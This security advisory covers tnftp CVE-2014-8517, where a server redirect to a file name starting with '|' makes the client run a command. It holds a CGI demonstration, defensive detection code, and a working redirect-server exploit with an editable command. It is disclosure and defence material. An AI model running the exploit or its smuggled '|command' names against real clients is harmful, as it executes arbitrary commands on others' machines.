Vulnerability warning: tnftp (the BSD ftp client) exposes a remote command execution vulnerability affecting multiple BSD, Linux and OS X systems (with a detection script)
On October 28, 2014, a public mailing-list post disclosed a remote command execution vulnerability in the tnftp client. Affected systems include Fedora, Debian, NetBSD, FreeBSD and OpenBSD, and even the latest Mac OS X release, Yosemite 10.10.
A NetBSD developer (Jared McNeill) confirmed the vulnerability: a malicious web server can make any client that fetches a URL with tnftp execute arbitrary commands, because a redirect to a URL whose last path component starts with "|" makes the client treat the rest of that component as a shell command to pipe the download into. The issue has been assigned CVE-2014-8517. His demonstration, with a CGI script named "redirect" and a second CGI file literally named "|uname -a":
a20$ pwd
/var/www/cgi-bin
a20$ ls -l
total 4
-rwxr-xr-x  1 root  wheel  159 Oct 14 02:02 redirect
-rwxr-xr-x  1 root  wheel  178 Oct 14 01:54 |uname -a
a20$ cat redirect
#!/bin/sh
echo 'Status: 302 Found'
echo 'Content-Type: text/html'
echo 'Connection: keep-alive'
echo 'Location: http://192.168.2.19/cgi-bin/|uname%20-a'
echo
a20$
a20$ ftp http://localhost/cgi-bin/redirect
Trying ::1:80 ...
ftp: Can't connect to `::1:80': Connection refused
Trying 127.0.0.1:80 ...
Requesting http://localhost/cgi-bin/redirect
Redirected to http://192.168.2.19/cgi-bin/|uname%20-a
Requesting http://192.168.2.19/cgi-bin/|uname%20-a
32      101.46 KiB/s
32 bytes retrieved in 00:00 (78.51 KiB/s)
NetBSD a20 7.99.1 NetBSD 7.99.1 (CUBIEBOARD) #113: Sun Oct 26 12:05:36 ADT 2014  Jared () Jared-PC:/cygdrive/d/netbsd/src/sys/arch/evbarm/compile/obj/CUBIEBOARD evbarm
a20$
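The demonstration above hinges on one decision in the client: the local output file is named after the last path component of the URL it ends up fetching, and an output name beginning with "|" is opened with popen(3) instead of open(2). The following is an added example, not tnftp's source code: a simplified Python model of that naming step (an assumption; the real code has more cases), the vulnerable and the hardened way of turning the name into an output target, and a check that scans constructed proxy log lines for redirects that would trigger the bug. It decodes the URL before looking for the pipe, so a Location header using "%7C" for "|" is caught as well; the IP 192.0.2.10 and the log format are made up for the example.

```python
#!/usr/bin/env python3
"""Model of the tnftp output-file handling behind CVE-2014-8517.

Added example, not tnftp's source. It mirrors the behaviour shown in the
demo above: the client names its output file after the last path component
of the (redirected) URL, and a name starting with '|' is handed to the shell.
"""
import re
from urllib.parse import unquote, urlsplit


def output_name_from_url(url):
    """Last path component of the URL, URL-decoded.

    Simplified model of how tnftp picks a local file name when the user
    gave none (assumption: the real code has more cases, e.g. a trailing
    '/'); it is enough to show the bug.
    """
    path = urlsplit(url).path
    return unquote(path.rsplit("/", 1)[-1])


def vulnerable_output_target(url):
    """Pre-fix behaviour: '|cmd' means "pipe the download into cmd".

    Returns ("popen", command) or ("file", name) instead of opening anything,
    so this can be run safely against hostile URLs.
    """
    name = output_name_from_url(url)
    if name.startswith("|"):
        return ("popen", name[1:])
    return ("file", name)


def hardened_output_target(url):
    """Post-fix behaviour: a server-chosen name is never a pipe.

    Also rejects empty names and anything containing a path separator, so a
    redirect cannot steer the download outside the working directory.
    """
    name = output_name_from_url(url)
    if name.startswith("|"):
        raise ValueError("server-supplied output name starts with '|'")
    if not name or "/" in name or name in (".", ".."):
        raise ValueError(f"unsafe output name {name!r}")
    return ("file", name)


# Constructed proxy log lines (not real traffic): two carry a malicious
# redirect, one of them with the pipe character percent-encoded.
SAMPLE_LOG = [
    "2014-10-28T10:00:01Z 302 GET /cgi-bin/redirect "
    "Location: http://192.0.2.10/cgi-bin/|uname%20-a",
    "2014-10-28T10:00:02Z 200 GET /index.html",
    "2014-10-28T10:00:03Z 302 GET /old "
    "Location: http://example.org/new/page.html",
    "2014-10-28T10:00:04Z 302 GET /x "
    "Location: http://192.0.2.10/cgi-bin/%7Cid",
]

LOCATION_RE = re.compile(r"Location:\s*(\S+)")


def flag_pipe_redirects(log_lines):
    """Return the redirect targets whose decoded file name starts with '|'.

    Decoding first matters: '%7C' becomes '|' after the client's URL
    decoding, so a raw substring search for '|' would miss the last entry.
    """
    hits = []
    for line in log_lines:
        m = LOCATION_RE.search(line)
        if m and output_name_from_url(m.group(1)).startswith("|"):
            hits.append(m.group(1))
    return hits


if __name__ == "__main__":
    demo = "http://192.0.2.10/cgi-bin/|uname%20-a"
    print("vulnerable:", vulnerable_output_target(demo))
    try:
        hardened_output_target(demo)
    except ValueError as e:
        print("hardened  :", e)
    print("flagged   :", flag_pipe_redirects(SAMPLE_LOG))
```

The point of keeping the user-supplied "|cmd" feature out of the picture is deliberate: the danger is not that tnftp can pipe into a command at all (that is a documented feature when the user types it), but that a name chosen by the remote server is treated the same way. The hardened variant therefore only refuses names that come from the URL.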
Vulnerability impact scope and announcement
Distributions and vendors such as Debian, Red Hat, Gentoo, Novell (SuSE Linux), DragonFly, FreeBSD, OpenBSD and Apple are aware of the hazard posed by this vulnerability. Among them, Debian, Red Hat, Gentoo and Novell have already issued advisories.
Vulnerability detection script (do not use it for illegal purposes)
The script below stands up a small HTTP server that answers any request with a 302 redirect to a URL whose last path component is "|" followed by the command in the cmd variable; a vulnerable tnftp that fetches any URL from that server will then run the command on the client. Point a test client at it only on a machine you own, because the command really is executed there.
#!/usr/bin/env python3
"""
Sample OSX/BSD FTP client exploit.

Written because ISO policies were doing my head in.

To exploit, edit the value of the cmd variable, then run the script.
To test:

    ftp http://<myserver>/foo

And you should see the command executed.

All wrongs reversed - @stevelord
"""
# Ported here from the original Python 2 script (BaseHTTPServer, urllib.quote,
# print statements) to the Python 3 equivalents; the behaviour is unchanged.
import socket
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import quote

hostname = socket.getfqdn()  # Set this to your IP if you have no FQDN
port = 8000                  # Set this to the port you want to run this on

# The command the vulnerable client will run; it becomes the part after
# the '|' in the redirect target.
cmd = "uname -a; echo You probably shouldnt execute random code from the Internet. Just saying."
cmd = quote(cmd)
redir = "http://" + hostname + ":" + str(port) + "/cgi-bin/|" + cmd


class RedirectHandler(BaseHTTPRequestHandler):
    def do_GET(self):
        if cmd in self.path:
            # Second request: the client has followed the redirect, so the
            # command has already been handed to the shell on its side.
            self.send_response(200)
            self.end_headers()
        else:
            # First request (any path): send the client to the poisoned URL.
            self.send_response(302)
            self.send_header("Location", redir)
            self.end_headers()


if __name__ == "__main__":
    print("redirecting to,", redir)
    httpd = HTTPServer((hostname, port), RedirectHandler)
    print("Started serving.")
    try:
        httpd.serve_forever()
    except KeyboardInterrupt:
        pass
    httpd.server_close()
    print("\nStopped serving.")
For more information about the vulnerability and the fix, see:
http://seclists.org/oss-sec/2014/q4/459
http://seclists.org/oss-sec/2014/q4/460
http://seclists.org/oss-sec/2014/q4/464
[Reference Information Source: nix-systems-affected-ftp-remote-command-execution-vulnerability]